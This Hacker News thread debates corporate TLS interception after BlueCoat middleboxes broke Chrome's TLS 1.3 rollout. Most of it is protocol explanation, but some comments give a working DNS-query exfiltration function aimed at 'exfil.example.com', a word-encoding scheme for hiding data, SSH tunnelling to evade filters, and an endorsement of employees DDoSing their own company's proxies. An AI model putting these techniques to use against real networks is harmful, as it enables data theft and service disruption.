In this case, it doesn't sound like they're reverting it because of overall breakage, but rather because it breaks the tool that would otherwise be used to control TLS 1.3 trials and other configuration. Firefox had a similar issue, where they temporarily used more conservative settings for their updater than for the browser itself, to ensure that people could always obtain updates that might improve the situation.
Good grief! From David Benjamin's final comment:
Note these issues are always bugs in the middlebox products. TLS version negotiation is backwards compatible, so a correctly-implemented TLS-terminating proxy should not require changes to work in a TLS-1.3-capable ecosystem. It can simply speak TLS 1.2 at both client <-> proxy and proxy <-> server TLS connections. That these products broke is an indication of defects in their TLS implementations.
It's understandable that I've never heard of BlueCoat: clearly this product's success is based more on selling to executives than on quality, and it has been some time since I worked in an organization that had executives to sell to.
Then don't filter content.
What these "enterprise environments" want is to leech off the Internet's knowledge while keeping a firm chokehold on the privacy of their own employees. Sadly, it looks like Google is caving in to their pressure.
All browser vendors provide the necessary bits for properly implemented HTTPS MITM, and have done so for ages. The requirements are fairly simple: basically, "allow locally trusted certificate roots and ignore key pinning for them".
If you're using your company's network, then they have every right to monitor all of the activity on it. They're trying to protect trade secrets, future plans, customer data, employee records, etc. from attackers who would use that information to do harm to the company, its customers, and its employees. If you don't want your employer to know what you're doing, then don't use the company computer or company network to do it. And while you may think that you're too tech savvy to fall prey to malware 1) not everyone at your company is, and 2) no amount of savvy will protect you from all malware, especially ones that gain a foothold through an unpatched exploit. And there's also that whole other can of worms: malicious employees.
-our commitment to our customers and regulatory compliance requires that we know where customer data is at all times. It would be lovely if all employees could be trusted with data at all times, but the reality is that some employees will steal information, as Google found out with Levandowski. That's Google's own information, though; they don't have a regulatory requirement to report the breach, whereas the data I protect legally requires full disclosure.
-malware is increasingly using HTTPS to communicate with C&C. Many malware families now install a trusted root cert so they can exfiltrate data over the less-monitored port 443 rather than port 80. When (not if) devices get compromised, we need to know what the attacker got.
I would love to not need to do this because it's a privacy mess and breaks applications all the time, but there simply are not better tools to serve as the last line of defence against data loss.
iOS has mostly solved this problem through a combination of not running unsigned code and APIs that let MDM draw a corporate data barrier inside the phone, but as long as desktop OSes remain, there will need to be some form of this.
Against that, making life hard for Chrome engineers' aggressive upgrade campaign is a pretty hard sell. "Buy a better box", perhaps, but I don't see a viable argument for "don't monitor".
Because one size really does fit all, and all environments have the same needs?
[0] https://www.fcc.gov/consumers/guides/childrens-internet-prot...
[1] https://www.fcc.gov/general/universal-service-program-school...
At least from my view, it's not so much that I don't want my company to know what I'm doing, as that I don't trust their software to securely MITM all of my traffic. This thread doesn't fill me with confidence about the competency of these corporate MITM proxies. And the recent Cloudflare news doesn't help either -- they're effectively the world's largest MITM proxy, and even they couldn't avoid leaking a huge amount of "secure" traffic.
There are surely sectors where it's necessary for a company to MITM all traffic, but I think most companies will do better security-wise by not messing with TLS. It's just too hard to get right.
From a privacy perspective, it doesn't really matter whether the monitoring happens centrally or not.
In the cases where I've seen strict filtering, laptops were forced through VPN connections to HQ, where the gateway then decides which parts of internal and external networks they are allowed to access.
It sounds like a perfectly reasonable behaviour if the goal is to "fail closed", to provide more security in a fashion similar to a whitelist.
If it sees that it's TLS, it should attempt a protocol downgrade.
I don't remember the exact details, but I recall reading that TLS has a mechanism to prevent version downgrades, precisely to defend against such "attacks", so the connection would not succeed in that case either.
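For the curious: in the TLS 1.2 era the relevant mechanism was TLS_FALLBACK_SCSV (RFC 7507), and the TLS 1.3 draft additionally puts a downgrade sentinel in the ServerHello random. A minimal sketch of the latter check, assuming the ServerHello bytes are already parsed; the function and names are illustrative, not any real library's API:

```python
# Sentinels a TLS-1.3-capable server writes into the last 8 bytes of
# ServerHello.random when it negotiates an older version (per the TLS 1.3
# draft, later RFC 8446, section 4.1.3).
DOWNGRADE_TLS12 = b"DOWNGRD\x01"  # server fell back to TLS 1.2
DOWNGRADE_TLS11 = b"DOWNGRD\x00"  # server fell back to TLS 1.1 or below

def check_for_downgrade(server_random: bytes, client_supports_tls13: bool) -> None:
    """Abort if a 1.3-capable client sees evidence of a forced downgrade."""
    if client_supports_tls13 and server_random[-8:] in (DOWNGRADE_TLS12, DOWNGRADE_TLS11):
        # The server could have spoken 1.3, yet something negotiated lower:
        # treat it as an attack instead of silently accepting the downgrade.
        raise ConnectionError("downgrade detected (illegal_parameter)")
```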
A few days ago there were other issues with this causing Chromium to stop working on *.google.com, so it's not just about middleboxes.
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=855434
https://bugs.chromium.org/p/chromium/issues/detail?id=693943
Most of the solutions I have seen for devices outside the corporate perimeter are some combination of enforced vpn and authenticated proxy that is internet accessible.
The way it is supposed to work is as follows: there is a protocol negotiation when the connection is established (which is obviously unencrypted), which contains the TLS versions supported. If the MITM proxy does not understand the version, it can just change these bytes to force the hosts to negotiate a lower version.
So the only reason BlueCoat fails is that the authors failed to implement a forced version downgrade.
(Also, it's possible to do server-address-based blocking without MITM.)
This reminds me of firewalls that weaken security by filtering unrecognized HTTP headers: https://news.ycombinator.com/item?id=12655180
Now, because engineers are so bad at saying 'no' to the people who want SSL MITM, it's apparently become a regulatory requirement. SSL MITM might let you passively surveil your employees' Facebook Messenger conversations, but it still doesn't protect you against a malicious employee who is tech-savvy (or malware written by people who have SSL MITM proxies in mind.) They could just put the information they want to smuggle out of the network into an encrypted .zip. They could even do something creative like using steganography to hide it in family photos that they upload to Facebook. The only real solution to this is to lock down the devices that people access the network on, not the network itself.
> At this point it's worth recalling the Law of the Internet: blame attaches to the last thing that changed.
> There's a lesson in all this: have one joint and keep it well oiled.
> When we try to add a fourth (TLS 1.3) in the next year, we'll have to add back the workaround, no doubt. In summary, this extensibility mechanism hasn't worked well because it's rarely used and that lets bugs thrive.
It isn't a question of whether they're allowed to do it, it's a question of whether they should do it.
It's ineffective against insider exfiltration of data unless you're also doing body cavity searches for USB sticks, and if you're at that point then the sensitive network should not be connected to the internet at all.
And it's similarly ineffective against malware because TLS is not the only form of encryption. What difference does it make if someone uploads a file using opaque TLS vs. uploading an opaque encrypted file using MITM'd TLS? Banning encrypted files, even if you could actually detect them, doesn't work because they're often required for regulatory compliance.
It isn't worth the security cost. The situation in the article is bad enough, but consider what happens if the MITM appliance itself gets compromised, when it has a root private key trusted by all your devices and read/modify access to all the traffic.
If merely advertising 1.3 while still advertising older versions causes BlueCoat to break, it has a bug in TLS version negotiation.
There is no downgrade or whitelist or failing closed. Each end says what it supports, and BlueCoat blows up the connection if it sees that the other end supports a newer version. It should say "oh, we both support 1.2, let's use that." And apparently it's done this before, so there's even less of an excuse for it.
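For reference, correct pre-1.3 version negotiation is about as simple as protocol logic gets; a minimal sketch (the constants are the TLS wire values):

```python
TLS_1_2 = 0x0303  # TLS wire values: major 3, minor 3
TLS_1_3 = 0x0304

def negotiate_version(client_max: int, server_max: int) -> int:
    # Each side states the highest version it supports; the connection
    # uses the highest version they share. A conforming implementation
    # never aborts merely because the peer's maximum is newer than its own.
    return min(client_max, server_max)

assert negotiate_version(TLS_1_3, TLS_1_2) == TLS_1_2  # "we both support 1.2, use that"
```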
That wouldn't be a certain Sergey Aleynikov and GS would it? (https://en.wikipedia.org/wiki/Sergey_Aleynikov)
If you're using your company's network, then they have every right to monitor all of the activity on it.
This is tantamount to steaming open and resealing the envelopes of all physical mail. Have some god damn ethics; I'd sooner quit than snoop traffic in this manner.

How so?
1. Connect to Corp Wifi
2. git clone companyapp.git
3. Connect to Employee Personal Wifi
4. Email tgz'ed companyapp
?
[1] https://en.wikipedia.org/wiki/Blue_Coat_Systems#Use_by_repre...
They also have 46,000 PCs. So yeah - pretty decent size...
We opted to disable USB mass storage, since cavity searches seemed a little much.
I would never trust a company device, or company network, with anything I consider sensitive. Use your own device and keep it on cellular.
Also, though I don't like it, employers in the US do have the right to open mail addressed to you personally if it's delivered to the office.
There's a good argument that it's unethical too. There are many ways where your company has to trust you instead of pervasively monitoring your doings and communications, and this should fall in the same area.
This is missing the point. Someone could plug a SATA drive directly into the motherboard, or otherwise compromise their work computer to disable the restrictions, or take pictures of documents with a camera, or bring their own computer on-site, or bring a line-of-sight wireless network device on-site, or send the data over the internet as an encrypted file or via ssh or using steganography, and so on.
The point is that preventing data exfiltration is not a trivial task, and if you're at all serious about it then the network containing the secrets is not connected to the internet. And if it's less serious than that then it can't justify a high-risk TLS MITM device.
This is exactly what I don't get. Since these abominations are becoming ubiquitous, surely malware writers are starting to work on workarounds? And in this case, it's as easy as setting up an SSH tunnel and running your malware traffic through it, which is a few days of work at most for a massive ROI.
This isn't true. The TLS protocol is not a philosophy; it does not have an opinion on who you should trust as a root certificate authority. If you trust a particular root, it is wholly within the design of TLS to allow connections that are monitored by whoever controls that root authority. Who is trusted is up to you.
>They may or may not mention that if they do it wrong it will degrade the security of everything on the network.
Right, that's why you don't do it wrong. This same argument applies for any monitoring technology, like cameras. An insecure camera system actually helps a would-be intruder by giving them valuable information. So if you install cameras, you'd better do it right.
As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all? There is no security panacea, just a wide range of imperfect measures to be deployed based on your threat model and resources. And luckily, most bad guys are pretty incompetent. But to address some examples you give, and show how not all is lost:
- A large encrypted zip file is sent out of the network. Depending on what your concerns are, that could be a red flag and warrant further analysis of that machine's/user's activity (a toy version of this check is sketched after this list).
- Software trying to circumvent your firewall/IDS is definitely a red flag. You might even block such detected attempts by default, and just maintain a whitelist for traffic that should be allowed regardless (e.g. for approved apps that use pinned certificates for updates).
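A toy illustration of the first red flag above: encrypted or compressed payloads sit close to 8 bits of entropy per byte, so a simple Shannon-entropy check can flag them for review. The threshold and size floor here are arbitrary assumptions, not tuned values:

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: ~8.0 for encrypted/compressed data, far lower for text."""
    counts = Counter(data)
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_encrypted(payload: bytes, threshold: float = 7.5, min_size: int = 4096) -> bool:
    # Small payloads give noisy entropy estimates, so ignore them.
    return len(payload) >= min_size and shannon_entropy(payload) > threshold
```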
I'd be interested to see the cost of compliance versus the subsidy. The federal government puts an awful lot of strings on financing for schools given the relatively low percentage of overall funding they pay.
I'd like to see some state somewhere turn down the money and see what they can do with the extra flexibility.
Quite a pain to work in such environments.
In the case of a security appliance -- such as this -- it should, in my opinion, "fail closed".
> This isn't true. The TLS protocol is not a philosophy; [...]
Well, the TLS specification [1] says as the first sentence of the introduction:
"The primary goal of the TLS protocol is to provide privacy and data integrity between two communicating applications."
I think, if something is "the primary design objective of TLS", it can be said that TLS is designed to do it.
https://jhalderm.com/pub/papers/interception-ndss17.pdf
How do you fix this when you're naught but a humble employee? Well, a friend of mine worked at a fairly large tech company where a salesguy for these boxes had convinced the CTO they had to have them. Every tech person "on the floor" hated the idea, so before the boxes were installed they conspired on their free time to write some scripts that ran lots of legitimate HTTPS traffic, effectively DDoSing the boxes and bringing the company's internet to a crawl for the day; Google would take ten seconds to open. Then obviously everyone (including the non-tech people) started calling the IT helpdesk complaining that the internet was broken. The MITM box salesguy then had to come up with a revised solution, costing 20x more than his first offer, and that was the end of that.
If you already are suffering under MITM boxes, a similar strategy with a slow ramp-up in traffic might work.
Yes, if one is determined enough, they will find a way to steal data.
> It isn't worth the security cost.
That's up for the company to decide... and apparently they have decided that it is worth the cost, regardless of what zrm, random person on the Internet, thinks.
The RFC (which if you're implementing TLS, you should have open at all times) explicitly calls out exactly this behavior:
> Note: some server implementations are known to implement version negotiation incorrectly. For example, there are buggy TLS 1.0 servers that simply close the connection when the client offers a version newer than TLS 1.0.
The quality of this vendor's implementation is extremely suspect.
I dunno. I know plenty of people who might want to work on an Excel spreadsheet at home over the weekend and so might e-mail it to their personal e-mail account. They would almost certainly reconsider, however, if it required copying that spreadsheet to a flash drive that they then had to hide in their ass, though.
In that case, it sounds like the device is effective after all.
Even protocol state (equivalents of TCP FIN/SYN/etc) is encrypted, to ensure that middleboxes don't get ideas about what the protocol is 'supposed' to do - ideas which make it hard to change the protocol in the future.
This isn't "failing closed", and this isn't a whitelist. TLS allows you to whitelist certain versions of the protocol during the initial negotiation at the start of the connection; that is the opportunity for either end to state what version of the protocol it would like. It is not permissible in the protocol to close the connection as Blue Coat is doing.
This isn't a downgrade attack, either: both server and client are free to choose their protocol version at the beginning. The client & server will later verify that the actual protocol in use is the one they intended; this is what prevents downgrades.
That's the simplest explanation, though, so that's probably what happened. Oh well.
Suppose you're a college dorm network. Then you can't justify TLS MITM because the risk of your MITM device actively creating a security hole that leads to all the students' bank passwords being stolen is greater than any benefit from centrally monitoring the traffic in that environment.
Suppose you're a highly classified government research lab. Then you can't justify TLS MITM because the bad guys are skilled foreign government agents and you need to isolate the network from the internet.
And there is no happy medium because the risk and cost of having all your TLS-secured data compromised scales with the target value. The higher the target value the higher the risk created by the MITM proxy, all the way up to the point that you can justify isolating the network from the internet.
In corporate environments, the last thing that changes is the thing that gets blamed. BlueCoat was not upgraded, Chrome was, and now things are broken? Not their fault.
Also, weren't there some security issues relating to the possibility of downgrading the encryption of a connection?
What you do while at work should not be personal, and thus it cannot really be "snooped" upon.
If you need to send a personal paper letter, you would go to the post office, not send it using the company's stamps, right?
The obvious place is the TLS version number in the handshake. It can say "I support up to TLS 1.3" and the other side can say "I support up to TLS 1.2", and the obvious choice is 1.2. But again, as soon as some webservers and middleboxes see 1.3 there, they freak out and block the connection completely.
Another idea for where to put it is in the candidate cipher list: an "oh, and I support TLS 1.3" pseudo-"cipher". The other side is supposed to just not use it if it's not recognized. But again, some stuff out there just freaks out.
Why do they freak out? Sometimes it's because someone thought that any unrecognized bit could be a hacking attempt. Sometimes it's because the software starts as a pile of bugs and is just debugged to the point that it mostly works today (and at that time "1.3" was never seen at exactly that spot).
So the goal of "GREASE" is to put random not-enumerated values in places like the ciphers list. Once a server or middlebox is compatible with GREASE, it'll be compatible with any future optional upgrade signal being present in those parts of the TLS handshake.
(I'm not sure where GREASE has been implemented so far, and I'm not sure if TLS 1.3 is 100% finalized yet.)
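A sketch of the GREASE idea (it was an IETF draft at the time of this thread; the reserved values below are the ones the draft defines, and the helper function is illustrative):

```python
import random

# The 16 reserved GREASE code points: 0x0A0A, 0x1A1A, ..., 0xFAFA.
# They look like real cipher suites/extensions but will never be assigned.
GREASE_VALUES = [0x0A0A + 0x1010 * i for i in range(16)]

def greased_cipher_list(real_ciphers: list[int]) -> list[int]:
    # Prepend one random GREASE value to the advertised cipher suites.
    # A conforming peer must ignore unknown values, so this is a no-op for
    # correct implementations and a tripwire for intolerant ones.
    return [random.choice(GREASE_VALUES)] + list(real_ciphers)
```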
> Have some god damn ethics
Personal attacks are not allowed on HN. We ban accounts that do this, so please don't do it.
We detached this subthread from https://news.ycombinator.com/item?id=13750650 and marked it off-topic.
It then simply inspects a connection it doesn't understand and 'fails closed' by preventing that connection.
Like the sibling comment said, this goes against the wording of the TLS specification, but I also think this is looking at the issue from the wrong perspective: from the perspective of the network admin rather than the user. The user does not trust the MITM proxy's fake root. Let's say you set up a corporate network and rather than just whitelisting the external IPs you trust, you give your users the freedom to browse the internet but you pipe everything through a BlueCoat proxy. Your users will take advantage of this freedom to do things like, say, checking their bank balance. When the user connects to the banking website, they will initialize a TLS session, the purpose of which is to keep their communication with their bank confidential. The user will assume their communication is confidential because of the green padlock in their address bar and the bank will assume their communication is confidential because it is happening over TLS. TLS MITM violates these assumptions. If the bank knew that a third party could see the plaintext of the communication, they probably would not allow the connection. If I ran a high-security website, I'd probably look for clues like the X-BlueCoat-Via HTTP header and just drop the connection if I found any.
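A minimal sketch of that last idea as WSGI middleware; the X-BlueCoat-Via header name comes from the comment above, and whether a given proxy actually adds it is an assumption:

```python
def reject_interception_proxies(app):
    """Wrap a WSGI app and refuse requests bearing proxy tell-tale headers."""
    def middleware(environ, start_response):
        # WSGI exposes request headers as HTTP_*; X-BlueCoat-Via
        # therefore shows up as HTTP_X_BLUECOAT_VIA.
        if "HTTP_X_BLUECOAT_VIA" in environ:
            start_response("403 Forbidden", [("Content-Type", "text/plain")])
            return [b"Connections via interception proxies are not accepted.\n"]
        return app(environ, start_response)
    return middleware
```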
> As for your list of ways such a system could be circumvented, I don't understand the logic of it. So because there are ways around a security measure, you shouldn't use the security measure at all?
In some cases, yeah. There are a lot of security measures out there that are just implemented to tick some boxes and don't provide much practical value. If they don't provide much value, but they actively interfere with real security measures (for example, by delaying the rollout of TLS 1.3) or they're just another point of failure and additional attack surface (bad proxies can leak confidential data, cf. Cloudflare,) they should be removed. I'll admit most bad guys are incompetent, but it's dangerous to assume they all are, because that gives the competent ones a lot of power, and someone who is competent enough to know that a network uses a TLS MITM proxy will just add another layer of encryption. (Or, like some other comments are suggesting, they'll just test your physical security instead and try to take the data out on a flash drive.)
Which holds trusted secret keys and which, in its normal unremarkable operation, intercepts, parses, reconstructs, decrypts, re-encrypts, forwards, and optionally logs both confidential and attacker-controlled traffic? And is also known to be used for nationwide bulk internet censorship by regimes often called 'oppressive'?
Why, doesn't it just.
Please consider, very carefully, the ethics and equities issues one might face with any interesting findings here.
This isn't just a fireable offense. Especially given the tendency for computer-related criminal laws to be overly vague, it's entirely possible you could be charged with a crime if you are intentionally trying to DoS your employer's network.
AIUI CIPA doesn't require MITM but most schools interpret it that way.
Or plain HTTP POSTs with encrypted content. If the filter rejects anything that looks encrypted, use plain HTTP POSTs that encode the binary as text: take a suitably sized file of words and encode the data as nonsensical rants posted to a suitable user-created sub-reddit (a toy version of this encoding is sketched below).
Or e-mails made using the same mechanism.
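A toy version of that encoding, assuming a local words.txt with at least 256 distinct words; one word per byte. Real exfiltration would be subtler, this just shows how trivial the primitive is:

```python
# Map each byte value to a word, turning binary data into plausible-ish text.
with open("words.txt") as f:
    WORDS = [w.strip() for w in f if w.strip()][:256]
assert len(WORDS) == 256, "need at least 256 distinct words"

INDEX = {w: i for i, w in enumerate(WORDS)}

def encode(data: bytes) -> str:
    return " ".join(WORDS[b] for b in data)

def decode(text: str) -> bytes:
    return bytes(INDEX[w] for w in text.split())
```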
If you want low-latency two-way communication, doing this can be a bit hard, but you basically have no way of stopping even a generic channel for passing data this way unless you whitelist a tiny set of trusted sites and reject all other network traffic (such as DNS lookups). And keep in mind you can't just lock down client traffic leaving the network; you also need to lock down your servers and filter things like DNS. The DNS approach described below works even through intermediary recursive resolvers (malware-infected desktop => trusted corporate recursive resolver => internet), unless they filter out requests for domains they don't trust.
But basically, if you allow data out, it's almost trivial to find ways to pass data out unless the channel is extremely locked down.
For those who don't know, there are even full IP proxies that use DNS [1], but you can hack up a primitive one using a shell script: set up a nameserver for a domain, turn on full query logging, and use a script that splits your file up, encodes it into valid DNS labels, and requests [some encoded segment].[yourdomain]. Now your file is sitting in pieces in your DNS query log, and all you need is a simple script to reassemble it.
Best of all is that it works even if it passes through intermediary DNS servers, such as a corporate proxy, unless it's heavily filtered (e.g. whitelisting domains) or too rate limited to be useful.
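A bare-bones sketch of the same trick in Python rather than shell; exfil.example.com stands in for the attacker-controlled zone, and the chunk size just keeps each encoded label under DNS's 63-byte limit:

```python
import base64
import socket

DOMAIN = "exfil.example.com"  # hypothetical zone whose nameserver logs all queries
CHUNK = 30                    # 30 raw bytes -> 48 base32 chars, under the 63-byte label limit

def exfiltrate(data: bytes) -> None:
    for offset in range(0, len(data), CHUNK):
        label = base64.b32encode(data[offset:offset + CHUNK]).decode().rstrip("=").lower()
        qname = f"{offset}.{label}.{DOMAIN}"
        try:
            socket.gethostbyname(qname)  # any resolver in the path forwards this upstream
        except socket.gaierror:
            pass  # NXDOMAIN is fine; the query already landed in the zone's logs
```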
TBH, for most techies I don't think opposition to MITM boxes comes down to "I don't want them to catch me looking at cat photos" but more along the lines of "this will actually reduce security as much as it improves it, and the companies providing these products are also aiding repressive regimes and human rights violations across the globe". Personally, I would find it unethical for the company I work for to buy these products.
> "Enterprise class Blue Coat’s SSL Visibility Appliance is comprehensive, extensible solution that assures high-security encryption. While other vendors only support a handful of cipher-standards, the SSL Visibility Appliance provides timely and complete standards support, with over 70 cipher suites and key exchanges offered, and growing. Furthermore, unlike competitive offerings, this solution does not “downgrade” cryptography levels and weaken your organization’s security posture, putting it at greater risk. As the SSL/TLS standards evolve, so will the management and enforcement capabilities of the SSL Visibility Appliance."
My intention was a (perhaps poorly worded) call on those in the industry to have a sense of ethics, and not meant to single any person in particular.
The TLS community knew that there would be version-intolerance problems with the deployment of TLS 1.3, because there always have been. That's why the version negotiation was changed and a mechanism called GREASE was invented to avoid just such problems. But it seems BlueCoat has shown us that there's no way to anticipate all the breakage introduced by stupid vendors.
The takeaway message is this: Avoid Bluecoat products at all costs. These companies are harming the Internet and its progress.
You can't even freeze Chrome extensions.
If you break my ability to monitor the use of my devices, your product is dropped from my network. You'll also find that it is dropped from the entire education sector. That is why Chrome has backed off this change.
I don't think so. Since when is it legal for anyone to circumvent encryption systems?
Is it legal for your ISP to do this on "their network"? Actually, I bet you think that's OK too.
Incidentally, "Blue Coat ProxySG 6642" was the only middlebox to get an "A" from the study referenced above. Apparently they didn't test for 1.3...
There are hundreds of thousands of organizations that need inspection and caching and proxying of internal www traffic. That all protocols should disallow or frustrate this disregards real needs of users and organizations.
Further still, if protocols can't be designed to be implemented easily or to allow for implementation bugs or lack of features, it's a crap protocol or application. Middleware will always be necessary, and encryption really shouldn't change the requirements of how middleware needs to work with a protocol.
In truth, though, if you start treating your employees like the enemy, it's just a never-ending uphill battle, especially if your employees are comp-sci folks. You could tunnel SSH over HTTP or even DNS if you cared enough.
I understand that proper network hosts will negotiate TLS versions rather than "freaking out".
(Note: I would also never trust a company device or company network, and I keep my personal devices completely separate from the company network for this reason. But I consider this a workaround for a deplorable situation, rather than just the way things are.)
Then in Firefox (or another browser), the SOCKS proxy is on localhost port 4242.
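Presumably the tunnel referred to here was created with OpenSSH dynamic port forwarding; a hypothetical sketch, with host and user invented for illustration:

```python
import subprocess

# OpenSSH's -D flag opens a local SOCKS proxy and tunnels everything
# it receives through the SSH connection to the remote host.
subprocess.run([
    "ssh", "-N",                  # no remote command, forwarding only
    "-D", "4242",                 # SOCKS proxy on localhost:4242
    "user@host.outside.example",  # hypothetical machine outside the filtered network
])
```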
Then leave the company in protest or convince it not to buy them. DDoSing the company's network is somehow not unethical, I guess?
My point is that actually helping this particular vendor, for example, may not be everyone's cup of tea.
It's pretty entertaining to read this Stack Overflow question about using SSL from 7 years ago: http://stackoverflow.com/questions/2177159/should-all-sites-...
Why isn't there an effort to detect MITM proxies and post equally scary warnings? Surely users have a right to know.
MITM is worse than self-signed certs, and if 'exceptions' can be found for MITM (corporate security, management, etc.), then the same exceptions should be found for self-signed certs for individuals, rather than creating dependencies on CA 'authorities'. This is just another instance of furthering corporate interests while sacrificing individuals.
You can create a self-signed CA and add it to your trusted roots to avoid warnings.
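A sketch of generating such a CA with the pyca/cryptography package (the name and lifetime are arbitrary choices; adding the result to your trusted roots is then an OS/browser settings step):

```python
import datetime

from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "My Personal CA")])

cert = (
    x509.CertificateBuilder()
    .subject_name(name)
    .issuer_name(name)  # self-signed: issuer == subject
    .public_key(key.public_key())
    .serial_number(x509.random_serial_number())
    .not_valid_before(datetime.datetime.utcnow())
    .not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=365))
    .add_extension(x509.BasicConstraints(ca=True, path_length=None), critical=True)
    .sign(key, hashes.SHA256())
)

with open("my-ca.pem", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.PEM))
```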
Similarly, good security people know that port filtering is a losing game unless you are willing to restrict everything to a known-safe whitelist – the malware authors do work full-time on tunneling techniques, after all – and may be focusing their efforts on endpoint protection or better isolation between users/groups.
Why not promote content encryption or explore other ideas that do not rely on central authorities? As it stands, there are always workarounds for corporations, but individuals are thrown under the bus.
I think it's reasonable for a company to want to filter everything that comes through their pipe; if anything, it's a bit of a liability not to do it. But at the same time, non-technical people should understand that their connection is being decrypted and re-encrypted, and be educated on the consequences.
There are a few local coffee shops which terminate SSL, and when people see me closing my browser and laptop, or starting to tether through my phone because of the cert error, they tell me "oh, you just need to accept all those certs!".
I need my personal email to do my work. It needs to stay secure from even my own employer. Period.
IOW, it's completely fair to argue that users might not have a universal right to encryption, but it's just as legitimate to argue that browser vendors have no obligation to enable the trivial circumvention of encryption. If the software doesn't work for your needs, then stop using the software.
The middleware should require effort to install, and it should be obvious when it is active. Otherwise, companies which have no business MITM'ing the traffic -- such as ISPs and free wifi providers -- will start to do it just because it's so simple.
For example, Google may require an MDM app on Android devices that are used to access corporate data. This app ensures that the device has the right policy (screen lock, encryption), and I think it may also check for malware apps. This is how it should be: if you need corporate control over devices, install a special application on them; it will be more efficient and it will do more.
While there was previously this "TLS fallback" implemented in Chrome to work around buggy endpoints, that was primarily due to buggy servers*, which was a much larger issue and difficult to fix, while these middlebox issues affect a much smaller portion of users, and we're hopeful that the middlebox vendors that have issues can fix their software in a more timely manner.
* TLS 1.3 moves the version negotiation into an extension, which means that old buggy servers will only ever know about TLS 1.2 and below for negotiation purposes and won't break in a new manner with TLS 1.3.
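To make that concrete, a rough sketch of the encoding from the TLS 1.3 draft: the ClientHello's legacy version field keeps saying 1.2, and 1.3 support rides in a supported_versions extension (type 43) that old servers simply ignore. The helper below is illustrative, not any real library's API:

```python
import struct

TLS_1_2 = 0x0303
TLS_1_3 = 0x0304
SUPPORTED_VERSIONS = 43  # extension type from the TLS 1.3 draft

def supported_versions_extension(versions: list[int]) -> bytes:
    # Body: one length byte, then two bytes per offered version.
    body = bytes([2 * len(versions)]) + b"".join(struct.pack("!H", v) for v in versions)
    # Extension framing: two-byte type, two-byte length, body.
    return struct.pack("!HH", SUPPORTED_VERSIONS, len(body)) + body

# The ClientHello's legacy_version stays 0x0303 (TLS 1.2), so a pre-1.3
# server that ignores unknown extensions sees an ordinary 1.2 hello.
ext = supported_versions_extension([TLS_1_3, TLS_1_2])
```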
Nobody made that argument. But browser makers have an obligation to keep the world wide web usable. If it's not usable, say goodbye to dot com companies selling services to businesses, which aside from advertising revenue (and the hopes and dreams of venture capitalists) is the only way they survive.
The only reasonable alternative if you start locking out legitimate business use cases of traffic inspection is to abandon the web and start making proprietary native applications and protocols like back in the old days. This is bad for users and bad for business.
It's not like it's even hard to support these use cases while maintaining user security! Browsers just totally suck at interfacing with a dynamic user role. Better UX and a more flexible protocol would solve this, but nobody wants to make browsers easier to use (if anything, the opposite).
Collective action (strikes, "work slowly protests" etc.) as a protest against company policy has a long precedent of a) being protected by law and b) being much more effective than a single employee quitting, while simultaneously reducing the downside for employees (in L_\infty norm).
Edit: the old Keynes quote comes to mind: "if you owe the bank $100 you have a problem, but if you owe the bank $100 million the bank has a problem" -- if 1 of the company's devs commits a "fireable offense", he/she has a problem, but if 100 of them do, the company has a problem.
In any case, you are left with either no SSH, or somebody watching your SSH and having control over your ability to tunnel.
The best you can do with these boxes is make a sub-tunnel over one of the protocols that they do allow through; you just can't rely on the primary encryption provided by the protocol that the middlebox is MITMing. If somebody actually looks at the traffic, they will see that you are not transferring plain text at the middlebox, so that might raise some eyebrows.
On Android, every time a user-installed certificate authority is used, a warning is shown. Furthermore, the user is forced to set a lock screen the moment they install a certificate.
If Google can push this (frankly user-unfriendly) UI through, why not change "Secure" to "Monitored" in Google Chrome? The green padlock is a lie, and the truth is exposed only after inspecting the certificate using the web developer tools.
Everything you listed is information that the company already has access to. Why isn't it sufficient for there to be access controls by policy, the same way the company protects other sensitive information from unauthorized access within the company?
For instance if your policies are too restrictive people will use their smartphones more and more to access the internet. Then some will start doing work stuff on their smartphones and you lose all control. What do you do then? Forbid smartphones within the company? Fire everybody you catch using one? It's just an arms race at this point.
Sane security measures and some pedagogy go a long way. Easier said than done though, it's a tough compromise to make.
This FindLaw article http://employment.findlaw.com/workplace-privacy/privacy-in-t... agrees that employers have a right to monitor communications from their devices on their networks, especially when this policy has been clearly laid out and agreed to by employees. Expectation of privacy is a major deciding factor in US law.
I'm not sure of the legality of an ISP doing this. I would hope it's illegal, but ISPs are weirdly regulated compared to, say, phone companies.
As a regular user, I can't just use a captive portal to get free wifi, because any site I go to has HTTPS, so they all break and I can't accept the god damn HTTP accept page unless I can conjure up a valid domain that has no HTTPS like I'm Svengali. Now all the OSes have special checks to see if there's a captive portal because the browsers couldn't be troubled to build a function for it, even though it would improve their security and usability at the same time.
Captive portals are not the enemy. Shitty UX and a bad attitude toward the needs of real users is. Locking browsers/protocols down more is just doubling down on this mentality.
Then continue to use the encryption that exists today. After all, your concern is for future standards that make encryption stronger.
> And fork a browser? Are you nuts?
A lone user forking a browser would be nuts. A company that's already willing to pay through the nose for MITM proxies can afford to fund a minor browser fork. Indeed, if this use case is as important as you suspect, then you ought to start a company that sells customized browsers for exactly this purpose. Think about what site you're on; where's your entrepreneurial spirit? :)
> But browser makers have an obligation to keep the world wide web usable.
Usable for whom? Between users (who need strong encryption), websites (who need strong encryption), and corporate intranets (who need to snoop), whose needs ought to be prioritized?
> abandon the web and start making proprietary native applications
The web emerged from a world where all applications were native and proprietary; I don't think any browser vendor is losing sleep over this possibility.
> Browsers just totally suck at interfacing with a dynamic user role.
Again, sounds like there's demand for a new browser then. :)
> nobody wants to make browsers easier to use (more the opposite)
Why is that?
I would argue against such an approach if there are alternatives but if the organization's leaders were set on it I would engage with the process and make sure that it did not evolve into more unethical practices such as logging all traffic contents or the above banking example.
Every non-Microsoft browser vendor used to cry themselves to sleep at night from days fighting against vendor lock-ins and corruption of standards. They certainly care if it all goes south.
